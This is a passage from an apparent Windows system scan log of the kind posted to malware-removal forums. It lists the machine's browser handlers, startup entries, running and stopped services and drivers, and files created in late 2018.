Handler: tbauth - {14654CA6-5711-491D-B89A-58E571679951} - C:\Windows\SysWOW64\tbauth.dll
Handler: windows.tbauth - {14654CA6-5711-491D-B89A-58E571679951} - C:\Windows\SysWOW64\tbauth.dll
SSODL: WebCheck - <orphaned>
CLSID: {603D3801-BD81-11d0-A3A5-00C04FD706EC} - C:\WINDOWS\System32\windows.storage.dll
x64-Run: [SecurityHealth] C:\Program Files (x86)\Windows Defender\MSASCuiL.exe
x64-Run: [SynTPEnh] C:\Program Files (x86)\Synaptics\SynTP\SynTPEnh.exe
x64-Run: [SysTrayApp] C:\Program Files\IDT\WDM\sttray64.exe
x64-mPolicies-System: DSCAutomationHostEnabled = dword:2
x64-mPolicies-System: EnableFullTrustStartupTasks = dword:2
x64-mPolicies-System: EnableUwpStartupTasks = dword:2
x64-mPolicies-System: SupportFullTrustStartupTasks = dword:1
x64-mPolicies-System: SupportUwpStartupTasks = dword:1
x64-IE: {2670000A-7350-4f3c-8081-5663EE0C6C49} - {48E73304-E1D6-4330-914C-F5F514E3486C} - C:\Program Files\Microsoft Office\Office16\ONBttnIE.dll
x64-IE: {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} - {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} - C:\Program Files\Microsoft Office\Office16\OCHelper.dll
x64-IE: {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - {FFFDC614-B694-4AE6-AB38-5D6374584B52} - C:\Program Files\Microsoft Office\Office16\ONBttnIELinkedNotes.dll
x64-Filter: text/xml - {807583E5-5146-11D5-A672-00B0D022E945} - C:\Program Files\Common Files\Microsoft Shared\OFFICE16\MSOXMLMF.DLL
x64-Handler: mso-minsb.16 - {3459B272-CC19-4448-86C9-DDC3B4B2FAD3} - C:\Program Files\Microsoft Office\Office16\MSOSB.DLL
x64-Handler: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files\Microsoft Office\Office16\MSOSB.DLL
x64-Handler: tbauth - {14654CA6-5711-491D-B89A-58E571679951} - C:\WINDOWS\System32\tbauth.dll
x64-Handler: windows.tbauth - {14654CA6-5711-491D-B89A-58E571679951} - C:\WINDOWS\System32\tbauth.dll
x64-SSODL: WebCheck - <orphaned>
x64-mASetup: {2C7339CF-2B09-4501-B3F3-F3508C9228ED} - /UserInstall
x64-mASetup: {89820200-ECBD-11cf-8B85-00AA005B4340} - U
x64-mASetup: {8A69D345-D564-463c-AFF1-A69D9E530F96} - "C:\Program Files (x86)\Google\Chrome\Application\68.0.3440.106\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level
x64-CLSID: {603D3801-BD81-11d0-A3A5-00C04FD706EC} - C:\WINDOWS\System32\windows.storage.dll
.
============= SERVICES / DRIVERS ===============
.
R0 intelpep;Intel(R) Power Engine Plug-in Driver;C:\WINDOWS\System32\drivers\intelpep.sys [2018-4-11 177192]
R0 iorate;Disk I/O Rate Filter Driver;C:\WINDOWS\System32\drivers\iorate.sys [2018-4-11 58272]
R0 SgrmAgent;System Guard Runtime Monitor Agent;C:\WINDOWS\System32\drivers\SgrmAgent.sys [2018-4-11 63896]
R0 volume;Volume driver;C:\WINDOWS\System32\drivers\volume.sys [2018-4-11 16288]
R0 WindowsTrustedRT;Windows Trusted Execution Environment Class Extension;C:\WINDOWS\System32\drivers\WindowsTrustedRT.sys [2018-8-17 72768]
R0 WindowsTrustedRTProxy;Microsoft Windows Trusted Runtime Secure Service;C:\WINDOWS\System32\drivers\WindowsTrustedRTProxy.sys [2018-4-11 18472]
R0 Wof;Windows Overlay File System Filter Driver;C:\WINDOWS\System32\drivers\wof.sys [2018-4-11 209816]
R1 afunix;afunix;C:\WINDOWS\System32\drivers\afunix.sys [2018-4-11 39424]
R1 ahcache;Application Compatibility Cache;C:\WINDOWS\System32\drivers\ahcache.sys [2018-4-11 254464]
R1 bam;Background Activity Moderator Driver;C:\WINDOWS\System32\drivers\bam.sys [2018-4-11 60320]
R1 CLVirtualDrive;CLVirtualDrive;C:\WINDOWS\System32\drivers\CLVirtualDrive.sys [2018-8-16 92536]
R1 FileCrypt;FileCrypt;C:\WINDOWS\System32\drivers\filecrypt.sys [2018-4-11 55808]
R1 GpuEnergyDrv;GPU Energy Driver;C:\WINDOWS\System32\drivers\gpuenergydrv.sys [2018-4-11 8192]
R2 AMD External Events Utility;AMD External Events Utility;C:\WINDOWS\System32\atiesrxx.exe [2014-9-15 257032]
R2 AMD FUEL Service;AMD FUEL Service;C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Service.exe [2014-9-15 344064]
R2 AODDriver4.3;AODDriver4.3;C:\Program Files\ATI Technologies\ATI.ACE\Fuel\amd64\aoddriver2.sys [2014-2-11 59616]
R2 APXACC;AppEx Networks Accelerator LWF;C:\WINDOWS\System32\drivers\appexDrv.sys [2018-9-20 228032]
R2 CDPSvc;Connected Devices Platform Service;C:\WINDOWS\System32\svchost.exe -k LocalService -p [2018-4-11 51288]
R2 CldFlt;Windows Cloud Files Filter Driver;C:\WINDOWS\System32\drivers\cldflt.sys [2018-8-17 414720]
R2 CoreMessagingRegistrar;CoreMessaging;C:\WINDOWS\System32\svchost.exe -k LocalServiceNoNetwork -p [2018-4-11 51288]
R2 DiagTrack;Connected User Experiences and Telemetry;C:\WINDOWS\System32\svchost.exe -k utcsvc -p [2018-4-11 51288]
R2 DusmSvc;Data Usage;C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted -p [2018-4-11 51288]
R2 hpsrv;HP Service;C:\WINDOWS\System32\hpservice.exe [2012-9-24 31040]
R2 HPSupportSolutionsFrameworkService;HP Support Solutions Framework Service;C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe [2017-11-21 333688]
R2 HPWMISVC;HPWMISVC;C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPWMISVC.exe [2012-9-7 35232]
R2 IconMan_R;IconMan_R;C:\Program Files (x86)\Realtek\Realtek PCIE Card Reader\RIconMan.exe [2018-9-21 2451456]
R2 SecurityHealthService;Windows Defender Security Center Service;C:\WINDOWS\System32\SecurityHealthService.exe [2018-8-17 760888]
R2 SgrmBroker;System Guard Runtime Monitor Broker;C:\WINDOWS\System32\SgrmBroker.exe [2018-4-11 163336]
R2 storqosflt;Storage QoS Filter Driver;C:\WINDOWS\System32\drivers\storqosflt.sys [2018-4-11 82432]
R2 SynTPEnhService;SynTPEnh Caller Service;C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [2016-4-28 253960]
R2 UserManager;User Manager;C:\WINDOWS\System32\svchost.exe -k netsvcs -p [2018-4-11 51288]
R2 UsoSvc;Update Orchestrator Service;C:\WINDOWS\System32\svchost.exe -k netsvcs -p [2018-4-11 51288]
R2 wcifs;Windows Container Isolation;C:\WINDOWS\System32\drivers\wcifs.sys [2018-4-11 151960]
R3 ALSysIO;ALSysIO;C:\Users\CHRIST~1\AppData\Local\Temp\ALSysIO64.sys [2018-8-20 46384]
R3 AtiHDAudioService;AMD Function Driver for HD Audio Service;C:\WINDOWS\System32\drivers\AtihdWT6.sys [2017-11-17 111112]
R3 CAD;Charge Arbitration Driver;C:\WINDOWS\System32\drivers\CAD.sys [2018-4-11 60320]
R3 camsvc;Capability Access Manager Service;C:\WINDOWS\System32\svchost.exe -k appmodel -p [2018-4-11 51288]
R3 DsSvc;Data Sharing Service;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted -p [2018-4-11 51288]
R3 lfsvc;Geolocation Service;C:\WINDOWS\System32\svchost.exe -k netsvcs -p [2018-4-11 51288]
R3 LicenseManager;Windows License Manager Service;C:\WINDOWS\System32\svchost.exe -k LocalService -p [2018-4-11 51288]
R3 NcbService;Network Connection Broker;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted -p [2018-4-11 51288]
R3 NdisVirtualBus;Microsoft Virtual Network Adapter Enumerator;C:\WINDOWS\System32\drivers\NdisVirtualBus.sys [2018-4-11 20992]
R3 NgcCtnrSvc;Microsoft Passport Container;C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted -p [2018-4-11 51288]
R3 NgcSvc;Microsoft Passport;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted -p [2018-4-11 51288]
R3 RSP2STOR;Realtek PCIE CardReader Driver - P2;C:\WINDOWS\System32\drivers\RtsP2Stor.sys [2018-8-16 310528]
R3 rt640x64;Realtek RT640 NT Driver;C:\WINDOWS\System32\drivers\rt640x64.sys [2018-4-11 604160]
R3 StateRepository;State Repository Service;C:\WINDOWS\System32\svchost.exe -k appmodel -p [2018-4-11 51288]
R3 TimeBrokerSvc;Time Broker;C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted -p [2018-4-11 51288]
R3 TokenBroker;Web Account Manager;C:\WINDOWS\System32\svchost.exe -k netsvcs -p [2018-4-11 51288]
R3 usbfilter;AMD USB Filter Driver;C:\WINDOWS\System32\drivers\usbfilter.sys [2018-8-16 58536]
R3 WarpJITSvc;WarpJITSvc;C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted [2018-4-11 51288]
R3 WdNisDrv;Windows Defender Antivirus Network Inspection System Driver;C:\WINDOWS\System32\drivers\wd\WdNisDrv.sys [2018-9-25 60584]
R3 WirelessButtonDriver64;HP Wireless Button Driver Service;C:\WINDOWS\System32\drivers\WirelessButtonDriver64.sys [2018-5-11 34944]
S2 DoSvc;Delivery Optimization;C:\WINDOWS\System32\svchost.exe -k NetworkService -p [2018-4-11 51288]
S2 MapsBroker;Downloaded Maps Manager;C:\WINDOWS\System32\svchost.exe -k NetworkService -p [2018-4-11 51288]
S3 AcpiDev;ACPI Devices driver;C:\WINDOWS\System32\drivers\AcpiDev.sys [2018-4-11 20480]
S3 ADP80XX;ADP80XX;C:\WINDOWS\System32\drivers\adp80xx.sys [2018-4-11 1135520]
S3 AJRouter;AllJoyn Router Service;C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted -p [2018-4-11 51288]
S3 amd_sata;amd_sata;C:\WINDOWS\System32\drivers\amd_sata.sys [2012-9-2 79528]
S3 amd_xata;amd_xata;C:\WINDOWS\System32\drivers\amd_xata.sys [2012-9-2 26280]
S3 amdkmafd;AMD Audio Bus Lower Filter;C:\WINDOWS\System32\drivers\amdkmafd.sys [2012-9-22 21160]
S3 applockerfltr;Smartlocker Filter Driver;C:\WINDOWS\System32\drivers\applockerfltr.sys [2018-4-11 18432]
S3 AppReadiness;App Readiness;C:\WINDOWS\System32\svchost.exe -k AppReadiness -p [2018-4-11 51288]
S3 AppXSvc;AppX Deployment Service (AppXSVC);C:\WINDOWS\System32\svchost.exe -k wsappx -p [2018-4-11 51288]
S3 bcmfn2;bcmfn2 Service;C:\WINDOWS\System32\drivers\bcmfn2.sys [2018-4-11 9728]
S3 bindflt;Windows Bind Filter Driver;C:\WINDOWS\System32\drivers\bindflt.sys [2018-4-11 92056]
S3 BTAGService;Bluetooth Audio Gateway Service;C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted [2018-4-11 51288]
S3 BthAvctpSvc;AVCTP service;C:\WINDOWS\System32\svchost.exe -k LocalService -p [2018-4-11 51288]
S3 bttflt;Microsoft Hyper-V VHDPMEM BTT Filter;C:\WINDOWS\System32\drivers\bttflt.sys [2018-4-11 38304]
S3 buttonconverter;Service for Portable Device Control devices;C:\WINDOWS\System32\drivers\buttonconverter.sys [2018-4-11 39936]
S3 CapImg;HID driver for CapImg touch screen;C:\WINDOWS\System32\drivers\capimg.sys [2018-4-11 123392]
S3 cht4iscsi;cht4iscsi;C:\WINDOWS\System32\drivers\cht4sx64.sys [2018-4-11 321432]
S3 cht4vbd;Chelsio Virtual Bus Driver;C:\WINDOWS\System32\drivers\cht4vx64.sys [2018-4-11 1836952]
S3 ClipSVC;Client License Service (ClipSVC);C:\WINDOWS\System32\svchost.exe -k wsappx -p [2018-4-11 51288]
S3 DevQueryBroker;DevQuery Background Discovery Broker;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted -p [2018-4-11 51288]
S3 diagnosticshub.standardcollector.service;Microsoft (R) Diagnostics Hub Standard Collector Service;C:\WINDOWS\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe [2018-8-17 90624]
S3 diagsvc;Diagnostic Execution Service;C:\WINDOWS\System32\svchost.exe -k diagnostics [2018-4-11 51288]
S3 DmEnrollmentSvc;Device Management Enrollment Service;C:\WINDOWS\System32\svchost.exe -k netsvcs -p [2018-4-11 51288]
S3 dmwappushservice;dmwappushsvc;C:\WINDOWS\System32\svchost.exe -k netsvcs -p [2018-4-11 51288]
S3 embeddedmode;Embedded Mode;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted -p [2018-4-11 51288]
S3 EntAppSvc;Enterprise App Management Service;C:\WINDOWS\System32\svchost.exe -k appmodel -p [2018-4-11 51288]
S3 FrameServer;Windows Camera Frame Server;C:\WINDOWS\System32\svchost.exe -k Camera [2018-4-11 51288]
S3 genericusbfn;Generic USB Function Class;C:\WINDOWS\System32\drivers\genericusbfn.sys [2018-4-11 20992]
S3 GraphicsPerfSvc;GraphicsPerfSvc;C:\WINDOWS\System32\svchost.exe -k GraphicsPerfSvcGroup [2018-4-11 51288]
S3 hidinterrupt;Common Driver for HID Buttons implemented with interrupts;C:\WINDOWS\System32\drivers\hidinterrupt.sys [2018-4-11 50592]
S3 hpqcaslwmiex;HP CASL Framework Service;C:\Program Files (x86)\HP\Shared\hpqwmiex.exe [2016-6-4 1031704]
S3 HvHost;HV Host Service;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted -p [2018-4-11 51288]
S3 HwNClx0101;Microsoft Hardware Notifications Class Extension Driver;C:\WINDOWS\System32\drivers\mshwnclx.sys [2018-4-11 27136]
S3 iagpio;Intel Serial IO GPIO Controller Driver;C:\WINDOWS\System32\drivers\iagpio.sys [2018-4-11 36864]
S3 iai2c;Intel(R) Serial IO I2C Host Controller;C:\WINDOWS\System32\drivers\iai2c.sys [2018-4-11 91648]
S3 iaLPSS2i_GPIO2;Intel(R) Serial IO GPIO Driver v2;C:\WINDOWS\System32\drivers\iaLPSS2i_GPIO2.sys [2018-4-11 79360]
S3 iaLPSS2i_GPIO2_BXT_P;Intel(R) Serial IO GPIO Driver v2;C:\WINDOWS\System32\drivers\iaLPSS2i_GPIO2_BXT_P.sys [2018-4-11 88576]
S3 iaLPSS2i_I2C;Intel(R) Serial IO I2C Driver v2;C:\WINDOWS\System32\drivers\iaLPSS2i_I2C.sys [2018-4-11 171520]
S3 iaLPSS2i_I2C_BXT_P;Intel(R) Serial IO I2C Driver v2;C:\WINDOWS\System32\drivers\iaLPSS2i_I2C_BXT_P.sys [2018-4-11 174592]
S3 iaLPSSi_GPIO;Intel(R) Serial IO GPIO Controller Driver;C:\WINDOWS\System32\drivers\iaLPSSi_GPIO.sys [2018-4-11 38128]
S3 iaLPSSi_I2C;Intel(R) Serial IO I2C Controller Driver;C:\WINDOWS\System32\drivers\iaLPSSi_I2C.sys [2018-4-11 113152]
S3 iaStorA;iaStorA;C:\WINDOWS\System32\drivers\iaStorA.sys [2012-9-28 650808]
S3 iaStorAVC;Intel Chipset SATA RAID Controller;C:\WINDOWS\System32\drivers\iaStorAVC.sys [2018-4-11 885144]
S3 ibbus;Mellanox InfiniBand Bus/AL (Filter Driver);C:\WINDOWS\System32\drivers\ibbus.sys [2018-4-11 526232]
S3 icssvc;Windows Mobile Hotspot Service;C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted -p [2018-4-11 51288]
S3 IndirectKmd;Indirect Displays Kernel-Mode Driver;C:\WINDOWS\System32\drivers\IndirectKmd.sys [2018-4-11 38912]
S3 InstallService;Microsoft Store Install Service;C:\WINDOWS\System32\svchost.exe -k netsvcs -p [2018-4-11 51288]
S3 IPT;IPT;C:\WINDOWS\System32\drivers\ipt.sys [2018-4-11 32256]
S3 IpxlatCfgSvc;IP Translation Configuration Service;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted -p [2018-4-11 51288]
S3 ItSas35i;ItSas35i;C:\WINDOWS\System32\drivers\ItSas35i.sys [2018-4-11 145816]
S3 LSI_SAS2i;LSI_SAS2i;C:\WINDOWS\System32\drivers\lsi_sas2i.sys [2018-4-11 124312]
S3 LSI_SAS3i;LSI_SAS3i;C:\WINDOWS\System32\drivers\lsi_sas3i.sys [2018-4-11 128408]
S3 LxpSvc;Language Experience Service;C:\WINDOWS\System32\svchost.exe -k netsvcs [2018-4-11 51288]
S3 mausbhost;MA-USB Host Controller Driver;C:\WINDOWS\System32\drivers\mausbhost.sys [2018-4-11 505240]
S3 mausbip;MA-USB IP Filter Driver;C:\WINDOWS\System32\drivers\mausbip.sys [2018-4-11 56736]
S3 MBAMService;Malwarebytes Service;C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe [2018-8-29 6541008]
S3 megasas2i;megasas2i;C:\WINDOWS\System32\drivers\MegaSas2i.sys [2018-4-11 75160]
S3 megasas35i;megasas35i;C:\WINDOWS\System32\drivers\megasas35i.sys [2018-4-11 82328]
S3 mlx4_bus;Mellanox ConnectX Bus Enumerator;C:\WINDOWS\System32\drivers\mlx4_bus.sys [2018-4-11 842648]
S3 NaturalAuthentication;Natural Authentication;C:\WINDOWS\System32\svchost.exe -k netsvcs -p [2018-4-11 51288]
S3 ndfltr;NetworkDirect Service;C:\WINDOWS\System32\drivers\ndfltr.sys [2018-4-11 108952]
S3 NetAdapterCx;Network Adapter Wdf Class Extension Library;C:\WINDOWS\System32\drivers\NetAdapterCx.sys [2018-4-11 175104]
S3 NetSetupSvc;Network Setup Service;C:\WINDOWS\System32\svchost.exe -k netsvcs -p [2018-4-11 51288]
S3 netvsc;netvsc;C:\WINDOWS\System32\drivers\netvsc.sys [2018-4-11 197632]
S3 nvdimm;Microsoft NVDIMM device driver;C:\WINDOWS\System32\drivers\nvdimm.sys [2018-4-11 104448]
S3 ose64;Office 64 Source Engine;C:\Program Files\Common Files\microsoft shared\Source Engine\OSE.EXE [2018-6-13 253640]
S3 percsas2i;percsas2i;C:\WINDOWS\System32\drivers\percsas2i.sys [2018-4-11 58776]
S3 percsas3i;percsas3i;C:\WINDOWS\System32\drivers\percsas3i.sys [2018-4-11 61848]
S3 PhoneSvc;Phone Service;C:\WINDOWS\System32\svchost.exe -k LocalService -p [2018-4-11 51288]
S3 PNPMEM;Microsoft Memory Module Driver;C:\WINDOWS\System32\drivers\pnpmem.sys [2018-4-11 16896]
S3 PushToInstall;Windows PushToInstall Service;C:\WINDOWS\System32\svchost.exe -k netsvcs -p [2018-4-11 51288]
S3 Ramdisk;Windows RAM Disk Driver;C:\WINDOWS\System32\drivers\ramdisk.sys [2018-4-11 39840]
S3 ReFS;ReFS;C:\WINDOWS\System32\drivers\refs.sys [2018-8-17 1921944]
S3 ReFSv1;ReFSv1;C:\WINDOWS\System32\drivers\refsv1.sys [2018-8-17 945568]
S3 RetailDemo;Retail Demo Service;C:\WINDOWS\System32\svchost.exe -k rdxgroup [2018-4-11 51288]
S3 rhproxy;Resource Hub proxy driver;C:\WINDOWS\System32\drivers\rhproxy.sys [2018-4-11 104448]
S3 RTL8168;Realtek 8168 NT Driver;C:\WINDOWS\System32\drivers\Rt630x64.sys [2018-8-16 690832]
S3 SandraAgentSrv;SiSoftware Deployment Agent Service;C:\Program Files\SiSoftware\SiSoftware Sandra Lite Titanium.RTMa\RpcAgentSrv.exe [2018-9-14 136192]
S3 ScDeviceEnum;Smart Card Device Enumeration Service;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2018-4-11 51288]
S3 scmbus;Microsoft Storage Class Memory Bus Driver;C:\WINDOWS\System32\drivers\scmbus.sys [2018-8-17 128920]
S3 SDFRd;SDF Reflector;C:\WINDOWS\System32\drivers\SDFRd.sys [2018-4-11 33176]
S3 SEMgrSvc;Payments and NFC/SE Manager;C:\WINDOWS\System32\svchost.exe -k LocalService -p [2018-4-11 51288]
S3 SensorDataService;Sensor Data Service;C:\WINDOWS\System32\SensorDataService.exe [2018-4-11 1273344]
S3 SensorService;Sensor Service;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted -p [2018-4-11 51288]
S3 SerCx2;Serial UART Support Library;C:\WINDOWS\System32\drivers\SerCx2.sys [2018-4-11 154528]
S3 SharedRealitySvc;Spatial Data Service;C:\WINDOWS\System32\svchost.exe -k LocalService -p [2018-4-11 51288]
S3 SmbDrv;SmbDrv;C:\WINDOWS\System32\drivers\Smb_driver_AMDASF.sys [2012-8-24 41272]
S3 SmbDrvI;SmbDrvI;C:\WINDOWS\System32\drivers\Smb_driver_Intel.sys [2012-8-24 43832]
S3 smphost;Microsoft Storage Spaces SMP;C:\WINDOWS\System32\svchost.exe -k smphost [2018-4-11 51288]
S3 SmsRouter;Microsoft Windows SMS Router Service.;C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted -p [2018-4-11 51288]
S3 SpatialGraphFilter;Holographic Spatial Graph Filter;C:\WINDOWS\System32\drivers\SpatialGraphFilter.sys [2018-4-11 57752]
S3 spectrum;Windows Perception Service;C:\WINDOWS\System32\Spectrum.exe [2018-8-17 976384]
S3 stornvme;Microsoft Standard NVM Express Driver;C:\WINDOWS\System32\drivers\stornvme.sys [2018-8-17 105368]
S3 storufs;Microsoft Universal Flash Storage (UFS) Driver;C:\WINDOWS\System32\drivers\storufs.sys [2018-8-17 48544]
S3 TieringEngineService;Storage Tiers Management;C:\WINDOWS\System32\TieringEngineService.exe [2018-4-11 303616]
S3 tzautoupdate;Auto Time Zone Updater;C:\WINDOWS\System32\svchost.exe -k LocalService -p [2018-4-11 51288]
S3 UcmCx0101;USB Connector Manager KMDF Class Extension;C:\WINDOWS\System32\drivers\UcmCx.sys [2018-4-11 128512]
S3 UcmTcpciCx0101;UCM-TCPCI KMDF Class Extension;C:\WINDOWS\System32\drivers\UcmTcpciCx.sys [2018-4-11 152576]
S3 UcmUcsi;USB Connector Manager UCSI Client;C:\WINDOWS\System32\drivers\UcmUcsi.sys [2018-4-11 57856]
S3 UdeCx;USB Device Emulation Support Library;C:\WINDOWS\System32\drivers\Udecx.sys [2018-4-11 45056]
S3 UEFI;Microsoft UEFI Driver;C:\WINDOWS\System32\drivers\uefi.sys [2018-8-17 29600]
S3 Ufx01000;USB Function Class Extension;C:\WINDOWS\System32\drivers\ufx01000.sys [2018-4-11 282008]
S3 UfxChipidea;USB Chipidea Controller;C:\WINDOWS\System32\drivers\UfxChipidea.sys [2018-4-11 98200]
S3 ufxsynopsys;USB Synopsys Controller;C:\WINDOWS\System32\drivers\ufxsynopsys.sys [2018-4-11 144288]
S3 UrsChipidea;Chipidea USB Role-Switch Driver;C:\WINDOWS\System32\drivers\urschipidea.sys [2018-4-11 29088]
S3 UrsCx01000;USB Role-Switch Support Library;C:\WINDOWS\System32\drivers\urscx01000.sys [2018-4-11 67992]
S3 UrsSynopsys;Synopsys USB Role-Switch Driver;C:\WINDOWS\System32\drivers\urssynopsys.sys [2018-4-11 28064]
S3 VacSvc;Volumetric Audio Compositor Service;C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted -p [2018-4-11 51288]
S3 vhf;Virtual HID Framework (VHF) Driver;C:\WINDOWS\System32\drivers\vhf.sys [2018-4-11 35328]
S3 vmgid;Microsoft Hyper-V Guest Infrastructure Driver;C:\WINDOWS\System32\drivers\vmgid.sys [2018-8-17 10240]
S3 vmicguestinterface;Hyper-V Guest Service Interface;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted -p [2018-4-11 51288]
S3 vmicvmsession;Hyper-V PowerShell Direct Service;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted -p [2018-4-11 51288]
S3 w3logsvc;W3C Logging Service;C:\WINDOWS\System32\svchost.exe -k apphost [2018-4-11 51288]
S3 WaaSMedicSvc;Windows Update Medic Service;C:\WINDOWS\System32\svchost.exe -k wusvcs -p [2018-4-11 51288]
S3 WalletService;WalletService;C:\WINDOWS\System32\svchost.exe -k appmodel -p [2018-4-11 51288]
S3 wcnfs;Windows Container Name Virtualization;C:\WINDOWS\System32\drivers\wcnfs.sys [2018-4-11 82944]
S3 wdiwifi;WDI Driver Framework;C:\WINDOWS\System32\drivers\WdiWiFi.sys [2018-8-17 781824]
S3 WdmCompanionFilter;WdmCompanionFilter;C:\WINDOWS\System32\drivers\WdmCompanionFilter.sys [2018-4-11 21408]
S3 WinMad;WinMad Service;C:\WINDOWS\System32\drivers\winmad.sys [2018-4-11 32152]
S3 WinNat;Windows NAT Driver;C:\WINDOWS\System32\drivers\winnat.sys [2018-8-17 227840]
S3 WinVerbs;WinVerbs Service;C:\WINDOWS\System32\drivers\winverbs.sys [2018-4-11 64920]
S3 WUDFWpdMtp;WUDFWpdMtp;C:\WINDOWS\System32\drivers\WUDFRd.sys [2018-4-11 264192]
S3 xboxgip;Xbox Game Input Protocol Driver;C:\WINDOWS\System32\drivers\xboxgip.sys [2018-8-17 295424]
S3 xinputhid;XINPUT HID Filter Driver;C:\WINDOWS\System32\drivers\xinputhid.sys [2018-4-11 46592]
S4 hvcrash;hvcrash;C:\WINDOWS\System32\drivers\hvcrash.sys [2018-4-11 33184]
S4 shpamsvc;Shared PC Account Manager;C:\WINDOWS\System32\svchost.exe -k netsvcs -p [2018-4-11 51288]
S4 ssh-agent;OpenSSH Authentication Agent;C:\WINDOWS\System32\OpenSSH\ssh-agent.exe [2018-4-12 495616]
.
=============== File Associations ===============
.
FileExt: .txt: txtfile=C:\WINDOWS\System32\NOTEPAD.EXE %1 [UserChoice]
ShellExec: opera.exe: open="C:\Users\Christopher&Gabriell\AppData\Local\Programs\Opera\Launcher.exe" "%1"
.
=============== Created Last 30 ================
.
2018-10-09 08:44:41 14652992 ----a-w- C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{765F7C9F-1CB4-4B4B-A7B4-9A30AEF02AB2}\mpengine.dll
2018-10-09 07:07:14 14652992 ----a-w- C:\ProgramData\Microsoft\Windows Defender\Definition Updates\Backup\mpengine.dll
2018-10-04 07:15:04 -------- d-----w- C:\Program Files (x86)\Ruiware
2018-10-04 07:15:03 -------- d-----w- C:\ProgramData\InstallMate
2018-09-30 05:31:57 -------- d-----w- C:\WINDOWS\SysWow64\wdegbma
2018-09-29 02:10:59 -------- d-----w- C:\Program Files (x86)\Microsoft ASP.NET
2018-09-28 04:42:44 -------- d-----w- C:\Users\Christopher&Gabriell\AppData\Local\CEF
2018-09-28 04:42:24 -------- d-----w- C:\Users\Christopher&Gabriell\AppData\Local\Facebook
2018-09-25 06:22:32 -------- d-----w- C:\WINDOWS\Panther
2018-09-22 17:04:38 -------- d-----w- C:\Users\Christopher&Gabriell\AppData\Local\Cyberlink
2018-09-20 10:13:39 1821184 ----a-w- C:\WINDOWS\System32\IDTNC64.cpl
2018-09-20 10:12:31 542208 ----a-w- C:\WINDOWS\System32\drivers\stwrt64.sys
2018-09-20 10:12:30 499200 ----a-w- C:\WINDOWS\System32\stcplx64.dll
2018-09-20 10:12:29 671744 ------w- C:\WINDOWS\System32\stapi64.dll
2018-09-20 10:12:29 255488 ----a-w- C:\WINDOWS\System32\st646425.dll
2018-09-20 10:12:29 2188800 ----a-w- C:\WINDOWS\System32\stapo64.dll
2018-09-20 10:12:14 -------- d-----w- C:\Program Files\IDT
2018-09-20 08:42:02 -------- d-----w- C:\Users\Christopher&Gabriell\AppData\Local\AppEx Networks
2018-09-20 08:37:15 228032 ----a-w- C:\WINDOWS\System32\drivers\appexDrv.sys
2018-09-20 08:37:14 -------- d-----w- C:\Program Files\AMD Quick Stream
2018-09-20 08:37:09 -------- d-----w- C:\Program Files (x86)\Common Files\ATI Technologies
2018-09-20 08:37:09 -------- d-----w- C:\Program Files (x86)\AMD AVT
2018-09-20 08:35:42 -------- d-----w- C:\Program Files\ATI Technologies
2018-09-20 08:23:04 -------- d-----w- C:\AMD
2018-09-14 10:29:33 -------- d-----w- C:\T32768
2018-09-14 09:13:17 -------- d-----w- C:\Users\Christopher&Gabriell\AppData\Roaming\AMD
2018-09-14 08:39:12 -------- d-----w- C:\ProgramData\Package Cache
2018-09-14 08:38:25 -------- d-----w- C:\Program Files\SiSoftware
2018-09-12 09:46:59 2172928 ----a-w- C:\WINDOWS\System32\AppXDeploymentExtensions.onecore.dll
.
==================== Find3M ====================
.
2018-10-06 07:18:38 65536 ----a-w- C:\WINDOWS\System32\spu_storage.bin
2018-09-25 06:33:29 60584 ----a-w- C:\WINDOWS\System32\drivers\wd\WdNisDrv.sys
2018-09-25 06:33:28 46184 ----a-w- C:\WINDOWS\System32\drivers\wd\WdBoot.sys
2018-09-25 06:33:28 352424 ----a-w- C:\WINDOWS\System32\drivers\wd\WdFilter.sys
2018-09-04 23:04:15 835144 ----a-w- C:\WINDOWS\SysWow64\FlashPlayerApp.exe
2018-09-04 23:04:15 179808 ----a-w- C:\WINDOWS\SysWow64\FlashPlayerCPLApp.cpl
2018-08-31 07:46:43 542504 ----a-w- C:\WINDOWS\System32\pcasvc.dll
2018-08-31 07:45:55 348328 ----a-w- C:\WINDOWS\System32\MusNotifyIcon.exe
2018-08-31 07:43:10 1524152 ----a-w- C:\WINDOWS\System32\msctf.dll
2018-08-31 07:42:49 1636232 ----a-w- C:\WINDOWS\System32\gdi32full.dll
2018-08-31 07:27:25 56320 ----a-w- C:\WINDOWS\System32\mf3216.dll
2018-08-31 07:27:10 178176 ----a-w- C:\WINDOWS\System32\t2embed.dll
2018-08-31 07:26:21 101888 ----a-w- C:\WINDOWS\System32\drivers\bowser.sys
